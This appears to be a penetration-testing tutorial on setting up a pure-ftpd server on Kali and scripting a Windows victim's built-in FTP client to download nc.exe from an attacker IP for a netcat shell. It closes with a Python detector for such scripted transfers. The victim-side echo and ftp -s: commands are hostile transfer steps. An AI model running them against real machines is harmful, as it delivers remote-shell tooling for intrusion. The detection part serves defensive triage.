In this article, we will set up an FTP server to transfer a more advanced payload, such as meterpreter, to the victim machine. This is convenient and reliable when transferring to a Windows machine, as an FTP client is already installed and enabled on all of them.
Once the steps below are complete, nc.exe is downloaded into the current directory on the victim, where we can execute it to get a more advanced shell with netcat.
FTP:
FTP stands for File Transfer Protocol. It allows us to upload files to and download files from an FTP server, with or without authentication. FTP runs over TCP, which provides a reliable means of transferring data.
Attacker IP address: 192.168.1.73
Tools used:
Kali Linux as OS
Pure-ftpd as FTP server
Windows 7 OS as the victim
Kali does not ship with an FTP server preinstalled, so we first need to install the pure-ftpd server.
[root@PentestPundit:~]apt-get install pure-ftpd
Now we have to create a system user and a group that the virtual FTP users will be mapped to when they log in. We give this system user a null shell and a null home directory (/dev/null). Check the newly created user with the id command.
[root@PentestPundit:~]groupadd ftpgroup
[root@PentestPundit:~]useradd -g ftpgroup -s /dev/null -d /dev/null ftpuser
[root@PentestPundit:~]id ftpuser
uid=1001(ftpuser) gid=1001(ftpgroup) groups=1001(ftpgroup)
Now create a home directory for the FTP user. Here we create a separate directory at the root of the filesystem and change its owner to the system user (ftpuser) we already created. Check the permissions with the ls command.
[root@PentestPundit:~]mkdir /ftp-home
[root@PentestPundit:~]chown -R ftpuser:ftpgroup /ftp-home/
[root@PentestPundit:~]ls -la /ftp-home/
Find the Netcat Windows executable on Kali with the following commands and copy nc.exe to our FTP home directory.
[root@PentestPundit:~]locate nc.exe
/usr/share/windows-resources/binaries/nc.exe
[root@PentestPundit:~]cp /usr/share/windows-resources/binaries/nc.exe /ftp-home/nc.exe
Now create the actual FTP user that will log in remotely.
[root@PentestPundit:~]pure-pw useradd pentester -u ftpuser -d /ftp-home/
Password:
Enter it again:
[root@PentestPundit:~]pure-pw mkdb
Pure-FTPd supports multiple backend database systems. We will use the default here.
[root@PentestPundit:~]cd /etc/pure-ftpd/auth/
[root@PentestPundit:/etc/pure-ftpd/auth]ln -s ../conf/PureDB 60pdb
Now start the pure-ftpd service and check whether port 21 is listening.
[root@PentestPundit:/etc/pure-ftpd/auth]service pure-ftpd start
[root@PentestPundit:/etc/pure-ftpd/auth]netstat -antlp | grep 21
On Victim Shell:
On the victim shell, use the command line to create a text file containing the following FTP commands. Then pass this text file to the victim's FTP client as its command script.
c:\> echo open 192.168.1.73 21> ftp.txt
c:\> echo USER pentester>> ftp.txt
c:\> echo pentester>> ftp.txt
c:\> echo bin >> ftp.txt
c:\> echo GET nc.exe >> ftp.txt
c:\> echo bye >> ftp.txt
c:\> ftp -v -n -s:ftp.txt
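For triage on the Windows side, the scripted transfer above leaves two artifacts: the ftp command line with -s: and the script file it points to. The following is an added example, not part of the original article, that flags such a command line and parses the script; the function names are hypothetical and the sample inputs are constructed from the commands shown above.

```python
import re

# Constructed inputs: the command line and the ftp.txt body the echo commands above produce.
SAMPLE_CMDLINE = r"ftp -v -n -s:ftp.txt"
SAMPLE_SCRIPT = "open 192.168.1.73 21\nUSER pentester\npentester\nbin \nGET nc.exe \nbye \n"
# ftp or ftp.exe as a whole program name (not sftp/tftp), followed by arguments.
FTP_RE = re.compile(r'(?i)(?:^|[\\/\s"])ftp(?:\.exe)?"?\s+(?P<args>.*)$')
SCRIPT_RE = re.compile(r'(?i)(?:^|\s)-s:(?:"([^"]+)"|(\S+))')
FLAG_RE = re.compile(r"(?:^|\s)-([A-Za-z])(?=\s|$)")
RISKY_EXT = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs")

def scripted_ftp(cmdline):
    """Return (script_path, flags) when ftp is driven by a -s: script, else None."""
    m = FTP_RE.search(cmdline)
    s = SCRIPT_RE.search(m.group("args")) if m else None
    if not s:
        return None
    flags = sorted(f.lower() for f in FLAG_RE.findall(m.group("args")))
    return (s.group(1) or s.group(2)), flags

def parse_ftp_script(text):
    """Pull server, user and transferred files out of an ftp -s: script body."""
    info = {"server": None, "port": 21, "user": None, "downloads": [], "uploads": []}
    for raw in text.splitlines():
        parts = raw.split()  # tolerates trailing blanks and blank lines
        if len(parts) < 2:
            continue         # bare lines (password, bin, bye) carry nothing we keep
        verb, arg = parts[0].lower(), parts[1]
        if verb == "open":
            info["server"] = arg
            if len(parts) > 2 and parts[2].isdigit():
                info["port"] = int(parts[2])
        elif verb == "user":
            info["user"] = arg
        elif verb in ("get", "recv", "mget"):
            info["downloads"].append(arg)
        elif verb in ("put", "send", "mput"):
            info["uploads"].append(arg)
    return info

def triage(cmdline, script_text):
    """Combine both artifacts into one finding; None if ftp was not scripted."""
    hit = scripted_ftp(cmdline)
    if hit is None:
        return None
    info = parse_ftp_script(script_text)
    info.update(script=hit[0], flags=hit[1])
    info["risky_downloads"] = [f for f in info["downloads"] if f.lower().endswith(RISKY_EXT)]
    return info
```

The command line would come from process-creation logging and the script body from the file recovered on disk; the parser deliberately does not keep the password line.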